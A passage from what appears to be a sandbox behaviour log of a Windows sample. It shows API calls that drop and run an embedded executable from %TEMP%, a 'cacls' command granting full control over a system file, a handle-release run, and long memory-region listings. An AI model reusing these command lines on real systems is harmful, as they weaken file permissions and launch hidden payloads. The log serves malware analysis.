\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf4\x9a\x2f\xad\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0293.549] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0293.549] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0293.550] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0293.550] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0293.550] GetCurrentProcess () returned 0xffffffff [0293.550] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0293.550] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0293.550] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0293.550] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0293.550] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0293.550] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0293.550] LockResource (hResData=0x43c648) returned 0x43c648 [0293.550] GetCurrentPackageId () returned 0x3d54 [0293.550] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0294.924] GetFileType (hFile=0x170) returned 0x1 [0294.924] WriteFile (in: hFile=0x170, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x19defc, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x19defc*=0x37000, lpOverlapped=0x0) returned 1 [0294.927] WriteFile (in: hFile=0x170, lpBuffer=0x5d2c88*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x19def8, lpOverlapped=0x0 | out: lpBuffer=0x5d2c88*, lpNumberOfBytesWritten=0x19def8*=0x490, lpOverlapped=0x0) returned 1 [0294.928] CloseHandle (hObject=0x170) returned 1 [0294.928] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0294.928] CreateProcessW (in: lpApplicationName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fac4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb08 | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x19fb08*(hProcess=0x174, hThread=0x170, dwProcessId=0xc30, dwThreadId=0xc34)) returned 1 [0295.166] WaitForSingleObject (hHandle=0x174, dwMilliseconds=0xffffffff) returned 0x0 [0296.650] DeleteFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 1 [0296.651] CloseHandle (hObject=0x174) returned 1 [0296.651] CloseHandle (hObject=0x170) returned 1 [0296.652] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0296.652] ExitProcess (uExitCode=0x0) Thread: id = 971 os_tid = 0xe90 Process: id = "134" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x5ee77000" os_pid = "0x94c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "126" os_parent_pid = "0x6e0" cmd_line = "cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9329 start_va = 0x6f0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 9330 start_va = 0x710000 end_va = 0x711fff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 9331 start_va = 0x720000 end_va = 0x733fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 9332 start_va = 0x740000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 9333 start_va = 0x780000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 9334 start_va = 0x7c0000 end_va = 0x7c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 9335 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 9336 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 9337 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9338 start_va = 0x7ebc0000 end_va = 0x7ebe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebc0000" filename = "" Region: id = 9339 start_va = 0x7ebe7000 end_va = 0x7ebe7fff entry_point = 0x0 region_type = private name = "private_0x000000007ebe7000" filename = "" Region: id = 9340 start_va = 0x7ebec000 end_va = 0x7ebeefff entry_point = 0x0 region_type = private name = "private_0x000000007ebec000" filename = "" Region: id = 9341 start_va = 0x7ebef000 end_va = 0x7ebeffff entry_point = 0x0 region_type = private name = "private_0x000000007ebef000" filename = "" Region: id = 9342 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9343 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9344 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9345 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9346 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9347 start_va = 0x7d0000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 9348 start_va = 0x7e0000 end_va = 0x7e1fff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 9388 start_va = 0x8d0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 9389 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9390 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9391 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9392 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9393 start_va = 0x8e0000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 9394 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9395 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9396 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 9397 start_va = 0x7eac0000 end_va = 0x7ebbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eac0000" filename = "" Region: id = 9428 start_va = 0x7f0000 end_va = 0x8adfff entry_point = 0x7f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9429 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9430 start_va = 0x8e0000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 9431 start_va = 0x920000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 9432 start_va = 0xa50000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 9433 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9434 start_va = 0x7ebe9000 end_va = 0x7ebebfff entry_point = 0x0 region_type = private name = "private_0x000000007ebe9000" filename = "" Region: id = 9435 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9436 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9437 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9438 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 9439 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9440 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9441 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 9442 start_va = 0xb50000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 9443 start_va = 0x710000 end_va = 0x713fff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 9473 start_va = 0x4d80000 end_va = 0x50b6fff entry_point = 0x4d80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9474 start_va = 0x8b0000 end_va = 0x8b1fff entry_point = 0x8b0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 969 os_tid = 0x990 Thread: id = 972 os_tid = 0xea4 Process: id = "135" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x768dc000" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0xf04" cmd_line = "vIDhS3md.exe -accepteula -c -y -p handles -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9455 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9456 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9457 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9458 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9459 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 9460 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 9461 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 9462 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9463 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9464 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 9465 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9466 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9467 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9468 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9469 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9470 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9471 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9472 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9494 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 9495 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9496 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9497 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9498 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9499 start_va = 0x480000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 9500 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9501 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9502 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9503 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 9732 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9733 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 9734 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9735 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9736 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 9737 start_va = 0x640000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 9738 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9739 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 9740 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9741 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9742 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9743 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9744 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 9745 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 9746 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 9747 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 9748 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 9749 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 9750 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 9751 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 9752 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 9753 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 9754 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 9755 start_va = 0x743b0000 end_va = 0x74441fff entry_point = 0x743b0000 region_type = mapped_file name = "comctl32.dll" filename = 